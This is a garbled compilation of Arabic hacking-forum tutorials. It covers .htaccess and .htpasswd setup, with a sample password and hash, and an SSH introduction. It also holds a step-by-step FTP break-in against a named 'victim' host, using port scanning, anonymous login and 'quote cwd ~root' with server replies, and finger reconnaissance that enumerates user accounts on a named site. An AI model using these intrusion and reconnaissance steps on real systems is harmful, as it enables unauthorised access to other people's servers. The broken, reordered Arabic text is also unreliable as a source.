ﻗﺎم ﻣﻮﺟﻮدﺑﺎﻟﺴﻔ ﻞ " و directory_fileﻫﻮ ﻣﻜﺎن ﻗﻢاﻟﺨﻄﺎ "اﻻر ﺑ ﺤﯿﺚ ﯾﻜﻮن error_numﻫﻮ ر
ﺘﺼﻤﯿﻤﻬﺎ . ﺘﻲﻗﻤ ﺖﺑ ﺻﻔ ﺤﻪا ل errorاﻟ
ErrorDocument 404 ﻣﺜﺎ ل :
/errors/nfound.html
ﻗﺎﻣﻬﺎ - :ا ل errorsوار
-----------------------
| | Bad Syntax | ٤٠٠
-----------------------
| | Unauthorized | ٤٠١
-----------------------
| |Not Used | ٤٠٢
-----------------------
| | Forbidden | ٤٠٣
-----------------------
| | Not Found | ٤٠٤
-----------------------
١٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
* ﻋﻤ ﻞاﻟﻤﻠ ﻒ .htpasswd
------------------------
ﺘﺨﺪاماﻟﻤﻠ ﻒ . ﺘﻰ ﻧﺴﻄﯿﻊاﺳوﯾﻤﻜﻨﻚأنﺗﻘﻮمﺑﻌﻤﻠﻪﺑﻨﻔ ﺲ ﻃ ﺮﯾﻘﺔاﻟﻤﻠ ﻒ ، htaccess.و ﺳﻮ ف ﻧﻌﻤﻠﻪ ﺣ
ﺘﺐﻓﻲاﻟﻤﻠ ﻒ htpasswdﻣﺎ ﯾﺄﺗﻲ -: htaccessﻓﻲاﻟ ﺤﻤﺎﯾﺔ و ﺳﻮ ف ﻧﻜ
user1:EncryptedPwd1
user2:EncryptedPwd2
ﺘﺨﺪم . oﺣﯿﺚان user1 , user2ﻫﻮاﺳﻢاﻟﻤﺴ
oو EncryptedPwd1 , EncryptedPwd2ﻫﻲﻛﻠﻤﺎ تاﻟﺴ ﺮ وﻟﻜﻦ ﻣﺸﻔ ﺮه و ﯾﻤﻜﻨﻚﺗﺸﻔﯿ ﺮاي
ﻗﻊ ﻛﻠﻤﺔﺗ ﺮﯾﺪﻫﺎ ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﻤﻮ
http://www.euronet.nl/~arnow/htpasswd
او http://www.e2.u-net.com/htaccess/make.htm
ﻓﻤﺜﻼﻟﻮاردﻧﺎ و ﺿﻊ ﯾﻮﺳ ﺮﺑﺎﺳﻢ Securityوﻛﻠﻤﺔاﻟﺴ ﺮاﻟﺨﺎ ﺻﺔﺑﻪ ﻫﻲ fu93hds3ﻧﺬﻫﺐاوﻻاﻟﻰ
ﻗﻊ http://www.euronet.nl/~arnow/htpasswd اﻟﻤﻮ
oو username : Security
oو passwrod & re-enter password : fu93hds3
ﺘﯿﺠﻪ Security:893bNicBcwszw <-- ﺘﻈﻬ ﺮاﻟﻨ oو ﻧ ﻀﻐﻂ ﻋﻠﻰاﻟﺰر claculateﻟ
ﺘﺨﺪاماﻟﻤﻠ ﻒ .
ﺘﻄﯿﻊاﺳ واﻻنﻗﺪاﺗﻤﻤﻨﺎ ﻋﻤ ﻞاﻟﻤﻠ ﻒ htaccess.واﻟﺬيﻗﻤﻨﺎﺑﻌﻤﻠﻪ و ذﻟﻚﻟﻜﻲ ﻧﺴ
htaccessﻟﻠ ﺤﻤﺎﯾﺔﺑﻜﻠﻤﺔ ﺳ ﺮ و ﯾﻮﺳ ﺮ .
٢٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
* ﻣﻨﻊاﻇﻬﺎراﻟﻤﻠ ﻒ htaccess.
-----------------------------
ﻗﺪ ﻋ ﺮﻓﻨﺎاﻻنانﻟﻬﺬااﻟﻤﻠ ﻒاﻫﻤﯿﻪﻛﺒﯿ ﺮهﻓﯿﺠﺐ ﻋﻠﯿﻨﺎان ﻧ ﺤﻤﯿﻪ ﺟﯿﺪا ،ﻓﺎﻟﺒ ﺮﻏﻢ ﻣﻦاناﻟﻤﻠ ﻒ ﻣﺨﻔﻲاﻻ
اﻧﻪ ﻏﯿ ﺮ ﺳﺎﻟﻢ ﻣﻦان ﯾﻜﻮناﻟﺴ ﺮﻓ ﺮ ﻧﻔﺴﻪ ﻏﯿ ﺮ ﻣﺆﻣﻦاواﻧﻪﻫﻨﺎكﺗﺼ ﺮﯾﺢ ﺧﻄﺄ ..
ﻟﺬﻟﻚ ﺳﻮ ف ﻧﻤﻨﻊ ﻋ ﺮ ض ﻫﺬااﻟﻤﻠ ﻒ ﻋﻦ ﻃ ﺮﯾ ﻖا ﺿﺎﻓﺔ ﻣﺎ ﯾﺄﺗﻲ - :
><Files .htaccess
order allow,deny
٢١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$
اﻟﻜﺎﺗﺐ:اﻟﺠﻮﻛ ﺮ
$$$$$$$$$
..........
٢٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺨﺪام ﻧﻈﺎمUNIX
ﻧﻘ ﻞاﻟﻤﻠﻔﺎ تﺑﺎﺳ
ﺘﺨﺪام ﺣﺴﺎبShell:
ﻧﻘ ﻞاﻟﻤﻠﻔﺎ تﺑﺎﺳ
٢٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
؛اﻟﻘﺴﻢاﻷﯾﺴ ﺮﺘﻨﻘﺴﻢ ﻧﺎﻓﺬةاﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻰﻗﺴﻤﯿﻦﺑﻌﺪ ذﻟﻚ ﺳﯿﻘﻮماﻟﺒ ﺮﻧﺎﻣ ﺞﺑﺎﻟﺪ ﺧﻮ لاﻟﻰاﻟ ﺤﺴﺎباﻟﻤﻄﻠﻮب ﻮﺳ
ﺘﻄﯿﻊ ﺟﻠﺐأوﻫﻮ ﺟﻬﺎزاﻟﻜﻤﺒﯿﻮﺗ ﺮﻟﺪﯾﻚ واﻟﻘﺴﻢ ﺎﻷﯾﻤﻦﻫﻮ ﺟﻬﺎزاﻟﻜﻤﺒﯿﻮﺗ ﺮاﻟﻤ ﻀﯿ ﻒ،ﻓﻲﻫﺬهاﻟﻤ ﺮ ﺣﻠﺔﺗﺴ
ﺘ ﺮﻧ ﺖﺄو
ﺘﻮﯾﺎ ت ﺣﺴﺎﺑﻚ ﻋﻠﻰاﻻﻧﺘ ﺤﻜﻢﻓﻲ ﻣ ﺤﺘﻄﯿﻊاﻟ
ارﺳﺎ لاﻟﻤﻠﻔﺎ تأوﺗﻐﯿﯿ ﺮاﺳﻤﺎﺋﻬﺎأو ﺣﺬﻓﻬﺎ ...اﻟ ﺦ.أيﺗﺴ
ﻋﻠﻰ ﺟﻬﺎزكﺑﺴﻬﻮﻟﺔﻓﺎﺋﻘﺔ.
٢٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻠ ﻒاﻟﻌ ﺮ ض ﺣﺴﺐ ﻧﻈﺎماﻟﻜﻤﺒﯿﻮﺗ ﺮً ﺟﻬﺎزه وﻛﺄﻧﻪ ﺟﺰ ء ﻣﻦ ذﻟﻚاﻟﻜﻤﺒﯿﻮﺗ ﺮ ﺎﻟﺒﻌﯿﺪ .وﯾﺨ
ﻛﻤﺒﯿﻮﺗ ﺮ ﻣ ﻀﯿ ﻒ ﺟﺎﻋﻼ
ﺘﺨﺪم ﻧﻈﺎم آ ﺧ ﺮﻓﯿﺠﺐﺘﺨﺪم ﻧﻈﺎم Windowsﻓﻼ ﻣﺸﻜﻠﺔأﻣﺎاذاﻛﺎن ﯾﺴ اﻟﻤ ﻀﯿ ﻒ.اذاﻛﺎناﻟﺠﻬﺎزاﻟﺒﻌﯿﺪ ﯾﺴ
ﺘ ﺤﻜﻢ ﻮأﻫﻢأﻣ ﺮ ﯾﺠﺐأنﺗﻌ ﺮﻓﻪﻫﻮ "؟" واﻟﺬي ﯾ ﺤ ﻀ ﺮﻟﻚﻗﺎﺋﻤﺔﺑﺎﻷواﻣ ﺮاﻟﻼزﻣﺔ. ﻣﻌ ﺮﻓﺔﺑﻌ ﺾاﻷواﻣ ﺮﻟﻠ
٢٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐhacker dz :
$$$$$$$$$$$$$$
ﺘ ﺤﺎم ﯾﺠﺐان ﯾﻜﻮنﻟﺪى ﻗﺘ ﺤﺎم ﻋﺒ ﺮاﻻ فﺗﻲﺑﻲ FTPأوﻻ وﻟﻨﺠﺎ حاﻹ ﻗﺘﻨﺎو ل ﻃ ﺮﯾﻘﺔإاﻟﯿﻮم ﺳﻮ ف ﻧ
ﺘﻮ ح ﻋﻠﯿﻚان ﺘﺄﻛﺪ ﻣﻦأناﻟﺒﻮر ت ﻣﻔﺘﻮ ح و ﻫﻮاﻟﺒﻮر تاﻟﺨﺎ ص با ل FTPوﻟ اﻟ ﻀ ﺤﯿﺔاﻟﺒﻮر ت ٢١ﻣﻔ
ﺘﻘ ﻞ
ﺘﻮ ح ﻧﻨ
ﺘﺄﻛﺪاناﻟﺒﻮر ت ﻣﻔ
ﺘﻌﻤ ﻞﺑ ﺮاﻣ ﺞاﻟﺴﻜﺎن وﻫﻲﻛﺜﯿ ﺮة و ﻣﻦاﻫﻤﻬﺎ Superscanneﺑﻌﺪﻣﺎﺗ ﺗﺴ
اﻟﻰاﻟﺨﻄﻮةاﻟﺜﺎﻧﯿﺔ و ﻫﻲ :
إ ﺿﻐﻂ ﻋﻠﻰ
Start
ﺛﻢ
Run
ﺘﺐﺛﻢاﻛ
ftp – n
ﺘﻮب ﻋﻠﯿﻬﺎﺳﻮ فﺗﻄﻠﻊﻟﻚ ﻧﺎﻓﺪةﻓﻲاﻟﺪوس ﻣﻜ
<FTP
ؤوﻛﻲﻟ ﺤﺪﻫﻨﺎﻛ ﻞ ﺷﻲ ءﺗﻤﺎم
ﺘﺐ وﺑﻌﺪﯾﻦاﻛ
Open
ﺛﻢإ ﺿﻐﻂ ﻋﻠﻰ
إد ﺧﺎ ل
Enter
ﺘﺎﻟﯿﺔﺘﯿﺠﺔاﻟ ﺘ ﺤﺼ ﻞ ﻋﻠﻰاﻟﻨ ﺳﻮ فﺗ
>FTP
To
ﺘﺐﺑﺠﺎﻧﺐ أﻛ
To
ﻗﻢاﻹﺑﻲﻟﻠ ﻀ ﺤﯿﺔﺛﻢإ ﺿﻐﻂ ﻋﻠﻰإد ﺧﺎ ل واﻵن ﺧﺪﺑﺎﻟﻚ ﻣﻌﻲ ر
إداﺗ ﺤﺼﻠ ﺖ ﻋﻠﻰ ﻫﺪااﻟ ﺮدﻓﻘﺪﺗﺨﻄﯿ ﺖ ﺧﻄﻮة
Connected to www.assassin.com
.(websrv1 Microsoft FTP Service (Version 4.0 ٢٢٠
ﺘﺎﻟﯿﺔ ftp>quote user ftp ﺘﺎﺑﺔاﻟﺘﺐاﻟﻜ واﻵنأﻛ
إداﺗ ﺤﺼﻠ ﺖ ﻋﻠﻰ ﻫﺪااﻟ ﺮدﻓﻘﺪﺗﺨﻄﯿ ﺖ ﺧﻄﻮة
Anonymous acces allowed, send identify (e-mail name) as ٣٣١
password.
ﺘﺎﻟﯿﺔ
ﺘﺎﺑﺔاﻟﺘﺐاﻟﻜ ﻮاﻵنأﻛ
ftp>quote cwd ~root
ﺈداﺗ ﺤﺼﻠ ﺖ ﻋﻠﻰ ﻫﺪااﻟ ﺮدﻓﻘﺪﺗﺨﻄﯿ ﺖ ﺧﻄﻮة
530 Please login with USER and PASS
ﺘﺎﻟﯿﺔ
ﺘﺎﺑﺔاﻟﺘﺐاﻟﻜ ﺛﻢأﻛ
٢٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٢٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
..........
٢٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
" ﺑﺮوﺗﻮﻛﻮل ﺧﺪﻣﺔ "Finger
$$$$$$$$$$$
اﻟﻜﺎﺗﺐLAMeR:
$$$$$$$$$$$$
ﻗﻊاواﻟﺴﯿ ﺮﻓ ﺮ
ﺘﺨﺪﻣﻲاﻟﻤﻮ
ﺷ ﺮ ح ﻻ ﺣﺪاﻟﺒ ﺮوﺗﻮﻛﻮﻻ تاﻟﻤﻬﻤﺔﻓﻲ ﺟﻤﻊاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻦ ﻣﺴ
1.1ﻣﻘﺪﻣﺔ ﻋﻦFinger
ﺘﺨﺪامFinger 1.2ﺎﺳ
ﺘﺨﺪام ﺧﺪﻣﺔFinger1.3ﺑﻌ ﺾاﻟﺨﺪ ع ﻋﻨﺪاﺳ
ﺘﺨﺪامFinger
ﻗﻊﺑﺄﺳ ﺘﻌﻼم ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﻮ1.4ﺎﻷﺳ
ﺘﺎج ﻣﻦ ﻫﺬااﻟﺪرس ﺘﻨ1.5ﺎﻷﺳ
ﺘﺎم1.6ﺎﻟﺨ
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
1.2ﻣﻘﺪﻣﺔ ﻋﻦFinger
>===================<
ّ Fingerﺪﯾﻤﻮن ﺧﺪﻣﺔﺗﻌﻤ ﻞ ﻋﻦ ﻃ ﺮﯾ ﻖ ﺎﻟﺒﻮر ت ٧٩ﻋﺎدة وﻛﺎﻧ ﺖ ﺈن
ﻗﻤﻲﻟﻠﻨﺎس. ﺘﺨﺪﻣﺔأﺻﻼﻛﻨﻮ ع businesscardﺮ ﻣﺴ
ﺘﺨﺪم ﺎﻟﺒﻌﯿﺪ ) (remote userﯾﻤﻜﻦأن ﯾ ﺮﺳ ﻞ ﻃﻠﺐإﻟﻰ Fingerﺪﯾﻤﻮن ﯾﺠ ﺮي ﻋﻠﻰ ﻧﻈﺎم ﻣﻌﯿﻦ ) ﺎﻟﻤﺴ
ﺑﻮر ت Fingerﻧﻮﻋﯿﺔ (٧٩وﺳﯿ ﺤﺼ ﻞ ﻋﻠﻰإﺟﺎﺑﺔ.
ﺘﺨﺪﻣﯿﻦ ﺘﺨﺪﻣﯿﻦ ﻋﻠﻰ ﻫﺬااﻟﻨﻈﺎم وأﯾ ﻀﺎﺑﻌ ﺾاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻦ ﻫﺆﻻ ءاﻟﻤﺴ ﺘﺨﺒ ﺮك ﻣﻦﻫﻢ ﺎﻟﻤﺴ ﻫﺬهاﻹﺟﺎﺑﺔ ﺳ
ﺘﺼﻠﯿﻦﺑﺎﻟﻨﻈﺎم. اﻟﻤ
ﺈ ﺿﺎﻓﺔإﻟﻰﻫﺬهاﻟﻤﻌﻠﻮﻣﺎ ت،ﻓﻲأﻏﻠﺐاﻷ ﺣﯿﺎناﻹﺟﺎﺑﺔﺗﺨﺒ ﺮكأﯾ ﻀﺎ ﻣﻦ ﺎﻟﺬي ﯾﺪﯾ ﺮاﻟﻨﻈﺎم )(adminﻮﻛﯿ ﻒ
ﻗﺎمﺑﺎﻹﺗﺼﺎ ل.
ـ
ﺘﻌﻼم ﻋﻦ ﻫﺬهاﻷﻧﻈﻤﺔ واﻟ ﺘﺨﺪماﻟﻨﺎساﻷﺗﺼﺎ ل ﻋﻠﻰ ﺟﻤﯿﻊاﻧﻮا عاﻷﻧﻈﻤﺔﻓﻲاﻟﻌﺎﻟﻢ و ﻃﻠﺐاﻷﺳ ﻗﺪﯾﻤﺎاﺳ
Fingerﻛﺎن ﯾﻌﻄﯿﻬﻢ ﻣﻌﻠﻮﻣﺎ ت ﻋﻦ ﺎﻟﻤﻮﺟﻮدﯾﻦﻓﻲاﻟﻨﻈﺎم وﻫ ﻞﻟﻬﻢ ﺣﺴﺎﺑﺎ تﻓﻲﻫﺬا ﺎﻟﻨﻈﺎم.وﻛﺎن Finger
ﺘﺨﺪمﻗﺪﯾﻤﺎﻓﻲاﻟﺠﺎﻣﻌﺎ ت واﻟﺸ ﺮﻛﺎ تاﻟﻜﺒﯿ ﺮةأﯾ ﻀﺎ. ﯾﺴ
ﺘﻌﻤ ﻞ ﻋﺎﻣﺔ ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﻄﻼبﻓﻲاﻟﺠﺎﻣﻌﺎ ت ﺎذاارادوا ﻣﻌﻠﻮﻣﺎ تﺗﺨ ﺺ ﻃﻼب ـ Fingerﺈﺳ ﻓﻲ ﺎﻟﻤﺎ ﺿﻲ ،اﻟ
ا ﺧ ﺮﯾﻦﻓﻲ ﻧﻔ ﺲاﻟﺠﺎﻣﻌﻪ .وﻛﺜﯿ ﺮا ﻣﺎﺗﻜﻮناﻷﺟﺎﺑﺔ )اﺟﺎﺑﺔ ) Finger Deamonﺑﺠ ﻤﻠﺔ " Finger
" !meﺎي "أﻋﻠﻤﻨﻲ ! "
ﻗﻊاﻟﻮﯾﺐﻗ ﻞ ﺷﻬ ﺮة ،ﻷﻧﻪﺗﻮﺟﺪاﻵن ﻣﻮا ﺘ ﺮﻧ ﺖ ﺎﻟﻌﺎﻟﻤﯿﺔاﺻﺒﺢ Fingerأ ﺄﻣﺎاﻵن وﻣﻊ وﺟﻮد ﺷﺒﻜﺔاﻹﻧ
ﺘﻬﺪﯾﺪﺘ ﺮﻧ ﺖ وﺑﺴﺒﺐ ﻣﻼ ﺣﻈﺔاﻟﻨﺎساﻟﺘﺨﺪﻣﯿﻦاﻷﻧ ﻗﻤﯿﺔ ﺧﺎﺻﺔﺑﻤﺴ ﻗﺔ ﻋﻤ ﻞ ) (bisinesscardﺮ ﻟﻠﻌﻤ ﻞﻛﺒﻄﺎ
ﺘﺨﺪام ﺧﺪﻣﺔFinger Deamon ّاﺳ ﺘ ﺮوﻧﻲﻗ ﻞﺎﻟﻮاﺳﻊﻟﻸﻣﻦاﻷﻟﻜ
ﻗﻊ )اﻷﻧﻈﻤﺔ(ﺗﻘﺪمﻫﺬه ﺎﻟﺨﺪﻣﺔ .وﻫﺬهﺘﺠﺪﺑﻌ ﺾاﻟﻤﻮا ﻋﻠﻰأﯾﺔ ﺣﺎ ل،ﻟﯿ ﺲﻛ ﻞاﻷﻧﻈﻤﺔ ﻣﻨﻌ ﺖﻫﺬهاﻟﺨﺪﻣﺔ وﺳ
ﺘﺨﺪامﺑ ﺮاﻣ ﺞ portscansﻟﻠﺒ ﺤﺚ ﻋﻦاﻟﺒﻮرﺗﺎ ت
ﺘ ﺮا قاﻷﻧﻈﻤﺔﺑﺄﺳاﻷﯾﺎم ﯾﻘﻮماﻟﻬﻜ ﺮزﺑﻤ ﺤﺎوﻻ تا ﺧ
ّأﺳﺎس ﻋﻠﻤﻲ . ﺘﻮ ﺣﺔ. . .ﺑﺪونأي اﻟﻤﻔ
ﺘﺰودكﺑﻜﻤﯿﺔ ﺿﺨﻤﺔ ﻣﻦ ﺎﻟﻤﻌﻠﻮﻣﺎ تﺘﺨﺪاﻣﻬﺎﻗﺎﻧﻮﻧﯿﺎﻟ
ّ Fingerﺪﯾﻤﻮن ،ﻣﺜﺎ ل ﻋﻈﯿﻢﻟﺨﺪﻣﺔ ﯾﻤﻜﻦاﺳ ﻟﺬﻟﻚإن
ّﺎﺳﺔاﻟ ﺤ ﺴ
٢٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺣﻮ ل ﻫﺪ ف.
ﻟﻬﺬا ﺳﻮ فأ ﺣﺎو لاناﺷ ﺮ حﻓﻲ ﻫﺬااﻟﺪرسﺑﻠﻐﺔ ﻣﻔﻬﻮﻣﺔ
ﺘﻚ :ﺘﺨﺪاﻣﻪﻓﻲ ﻣﺼﻠ ﺤ ﻣﺎ ﻫﻮ Fingerﺪﯾﻤﻮن وﻣﺎذا ﯾﻔﻌ ﻞ وﻛﯿ ﻒ ﯾﻤﻜﻦاﺳ
ﺘﺨﺪﻣﯿﻦ
ﺘﺨﺪ مﻟﺠﻠﺐاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻦ اﻟﻤﺴاﻟﺨﻼﺻﺔاﻟﻤﻘﺪﻣﺔ:ان ﺧﺪﻣﺔ Fingerﻛﺎﻧ ﺖﻗﺪﯾﻤﺎ وﻻزاﻟ ﺖﺗﺴ
اﻟﻤﻮﺟﻮدﯾﻦﻓﻲاﻟﻨﻈﺎم وﻫ ﻞﻟﺪﯾﻬﻢ ﺣﺴﺎﺑﺎ تﻓﻲ ﻫﺬااﻟﻨﻈﺎمام ﻻ.
ﻗﻊ
ﺘ ﻀﺎﻓﺔاﻟﻤﻮا
ﺘﺨﺪمﻓﻲاﺳ
ﻣﻼ ﺣﻈﺔ :اﻟﻨﻈﺎم ) ( serverﻫﻮ ﺟﻬﺎزﻛﻤﺒﯿﻮﺗ ﺮﺗﺨﺰنﻓﯿﻪ ﻣﻌﻠﻮﻣﺎ تﻫﺎﺋﻠﺔ ﻮﯾﺴ
ﺘﺨﺪامFinger
1.3ﺎﺳ
>=================<
ﻗﻊ ﻣﻌﯿﻦ )ﻣﺜﻼﺘﺨﺪاماي ﻣﻦﺑ ﺮاﻣ ﺞاﻟﺴﻜﺎن ﺎﻟﻤﻌ ﺮوﻓﺔ ﻣﺜ ﻞ ) (superscanﻟﻠﺒ ﺤﺚﻓﻲ ﻣﻮ ﻋﻨﺪاﺳ
ﺘﻮ ﺣﺎﻫﺬا ﯾﻌﻨﻲان ) http://www.israel.com/ﻮوﺟﺪ تﺑﻪ ﻣﻨﻔﺬ (Portﺑﻮر ت( ٧٩ﻣﻔ
http://www.israelr.com/
ﻟﻪ Fingerﺪﯾﻤﻮن ﯾﻌﻤ ﻞ.
ﺘﻌﻼم؟ ﻋﻦ ﻃ ﺮﯾ ﻖ وﻧﺪوز ـ ) (requestﻃﻠﺐاﺳ ﺎﻵنﻛﯿ ﻒ ﻧﻘﻮمﺑ
ـ Fingerﻣ ﺮﻛﺐ ) ( installedﻟﺬﻟﻚ ﻓﻲأﻏﻠﺐاﻷ ﺣﯿﺎن وﻧﺪوز ﻻ ﯾﻮﺟﺪﺑﻪ زﺑﻮن ) (clientﺧﺎ صﻟﻠ
ـ Finger ﺘﺨﺪم Telnetﻛﺨﺎدمﻟ ﺳﻮ ف ﻧﺴ
--ﺗﻮ ﺿﯿﺢ--
Telnet(client) --------request-------> Finger Deamon(in Server) o
ﺘﺎﺑﺔاﻟﺴﻄ ﺮ ﺎﻵﺗﻲﻓﻲ ﻣﻮﺟﺔاﻟﺪوس(MS DOS ) : ﻋﻦ ﻃ ﺮﯾ ﻖﻛ
79http://www.foobar.com/telnet
ﺑﻌﺪ ذﻟﻚ ﺳﯿﻈﻬ ﺮﻟﻚﺑ ﺮﻧﺎﻣ ﺞ telnetﻮ ﻣﻨﻪﺗﻄﺒﻊاﻷواﻣ ﺮ .
ﺘﻌﻤ ﻞﺗﯿﻠﻨ ﺖﻷﻧﻪ ﯾﻮﺟﺪﺑﻨﻈﺎمﻟﯿﻨﻮﻛ ﺲ زﺑﻮن) (clientﺧﺎ صﺑﺨﺪﻣﺔ ﺎﻣﺎ ﻣﻦ ﯾﻮﻧﯿﻜ ﺲﻟﺴﻨﺎﺑ ﺤﺎﺟﺔإﻟﻰأن ﻧﺴ
ّﺐ ﻋﻠﻰ ﺎﻟﻨﻈﺎمﺑﺸﻜ ﻞ داﺋﻢﺗﻘ ﺮﯾﺒﺎ. Finger Deamonﻣ ﺮﻛ
ﺘﺨﺪام ﺘﻤ ﺮارﺑﺄﺳﺘﺨﺪﻣﻲﻟﯿﻨﻮﻛ ﺲأﻣﺎأذاﻗ ﺮر تاﻷﺳ ﺘﻰ ﻧﻬﺎﯾﺔاﻟﺪرسﻟﻤﺴ ﺘﺎﻟﻲ ﺣﻣﻼ ﺣﻈﺔ :::ﺳﯿﻜﻮناﻟﺸ ﺮ حاﻟ
ﺘﻲ ﺘﺎﺑﺔاﻷواﻣ ﺮﻫﻲ ﻧﻔ ﺲ ﺎﻷواﻣ ﺮاﻟ
ﺘﻜﻮنﻛ ﺘﻠﻨ ﺖ وﺳ ﺘﺎﺑﺔاﻷواﻣ ﺮﻓﻲ ﻣﻮﺟﻪاﻟﺪوسﺛﻢﻓﻲاﻟ ﺘﻜﻮنﻛ ﻮﻧﺪوز ﺳ
ﻗﻊ ﺘﺨﺪام ﻧﻈﺎمﻟﯿﻨﻮﻛ ﺲ وﻟﻜﻦﺑﺪ ل "@" ﻧ ﻀﻊ "ﻣﺴﺎﻓﺔﺛﻢ "wwwﻓﻲ ﺎﻟﻮﻧﺪوز ﻣ ﺮاﻋﯿﺎاﺳﻢاﻟﻤﻮ ﺘﺐﺑﺄﺳ ﺗﻜ
ﺘﺎﺑﺔاﻷواﻣ ﺮﻓﻲﻟﯿﻨﻮﻛ ﺲ ﻫﻜﺬا : ﻣﺜﻼ ﯾﻜﻮنﻛ
finger@anyname.com
ﻮﻟﻜﻦﻓﻲ وﻧﺪوز ﺳﯿﻜﻮنﻫﻜﺬا http://www .anyname.com/finger :
ﻻ ﺣﻆاﻟﻤﺴﺎﻓﺔﺑﯿﻦ fingerﻮ www
ﺘﺨﺪم ) ( unix shell ﺘ ﺮا ضاﻧﻚﺗﺴ ﺎ ﻃﺒﻊﻓﻲ ﻣ ﺤﺚاﻷواﻣ ﺮﻓﻲ ﯾﻮﻧﻜ ﺲ ) ﻋﻠﻰاﻓ
finger@israel.com
ﻗﻊ ( ﻫﻨﺎ ﻫﻮ http://www .israel.com/ﻛﻤﺜﺎ ل ﺘﺨﺪﻣﻲﻫﺬااﻟﻤﻮ ﻻ ﺣﻆاناﻟﻬﺪ ف )ﻟﻤﻌ ﺮﻓﺔ ﻣﻦﻫﻢ ﻣﺴ
ﺘﺎﺋ ﺞ:ﺘﻈﻬ ﺮاﻟﻨ
ﻓﺴ
Login: Name: Tty: Idle: When: Where:
root israel sys console 17d Tue 10:13 node0ls3.israel.com
>Amos Amanda <.......> <.......> <.......
Anderson Kenneth
Bright Adrian
Doe John
٣٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٣١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٣٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐACID BURN_EG:
$$$$$$$$$$$$$$$$$$$
ﻗﺪاﺳﺒﻘﻬﺎاﻟﻜﺎﺗﺐﺑﻤﻘﺪﻣﺔ ﻣﻦ ﻋﻨﺪه ....
ﻗﻊ و
ﻗﻲاﻟﻤﻮا
ﺘﺮﺘﺒ ﺮ ﻫﺎﻣﺔ ﺟﺪاﺑﺎﻟﻨﺴﺒﺔﻟﻤﺨ
ﺘﺒ ﺮأداة secure shellﻣﻦأﻫﻢاﻻدوا تﻓﻰاﻟﺸﺒﻜﺎ ت وﺗﻌ ﺗﻌ
ﺘﺼﺎرSSh :: ﺘ ﺮﻧ ﺖ وﻏﺎﻟﺒﺎ ﻣﺎ ﻧﺠﺪﻫﺎﺑﻬﺬااﻻ ﺧ
ﺘﺨﺪﻣﻬﺎ ﻣﻌﻈﻢاﻟﺴﯿ ﺮﻓ ﺮا ت ﻋﻠﻰاﻻﻧ
ﺗﺴ
ﺘﻰ ﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎ r- commandsﻓﻰ ﺘﺨﺪاما ل secure shellﻋﻠﻰاﻻدوا تاﻻ ﺧ ﺮىاﻟ ﻟﻤﺎذا ﯾﻔ ﻀ ﻞ ﺎﺳ
ﯾﻮﻧﻜ ﺲ ﻛﺎﻟﻤﺬﻛﻮرﯾﻦﻓﻰاﻻﻋﻠﻰ ؟
======================
ﺘﻰ ﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎ r- commandsﻣﺜ ﻞ ﺘﻌ ﺮ ض ﺎﻻدوا تاﻟ ﻓﻰﺗﻮزﯾﻌﺎ تاﻟﯿﻮﻧﻜ ﺲ ﻣﺜ ﻞا ل *BSDﺗ
ﺘﺴﺐا ل ﺘﻄﺎ عان ﯾﻜﺘﻠﻔﻪ ﻣﻦ ﺎﻟﻬﺠﻤﺎ ت ﺣﯿﺚاﻧﻪﻟﻮ ﺷﺨ ﺺاﺳ )(rlogin,rsh and rcpﺎﻟﻰاﻧﻮا ع ﻣﺨ
ﺘﻰ ﻋﻠﻰاﻟﺸﺒﻜﻪﺑﻄ ﺮﯾﻘﻪ ﻣﺎاوﻓﻌﻠﻬﺎ ن ﻃ ﺮﯾ ﻖاﺗﺼﺎ لﻓﯿﺰﯾﺎﺋﻰ رو تاﻛﺴﯿ ﺲ )(root accessﻟﻼﺟﻬﺰهاﻟ
ﺘﻄﯿﻊ ﺘﻰ ﻋﻠﻰاﻟﺸﺒﻜﻪﺑﺪونادﻧﻰ ﺻﻌﻮﺑﻪ ﻻﻧﻪ ﯾﺴ اى رﯾﻤﻮﺗﻠﻰ ﯾﻤﻜﻨﻪان ﯾﺪ ﺧ ﻞاﻟﻰﻛ ﻞﺑﯿﺎﻧﺎ تاﻻﺟﻬﺰهاﻟ
ﺑﺎﻟ ﺮو تاﻛﺴ ﺲان ﯾﻌﺒ ﺮ ﻣﻦ ﺧﻼ لاىاداه ﻣﻦاﻟﻤﺬﻛﻮرهﻓﻰ ﯾﻮﻧﻜ ﺲﺑﺪوناى ﺻﻌﻮﺑﻪ و ﯾﻤﻜﻨﻪﺗﻔﺎدﯾﻬﺎﺑﻄ ﺮ ق
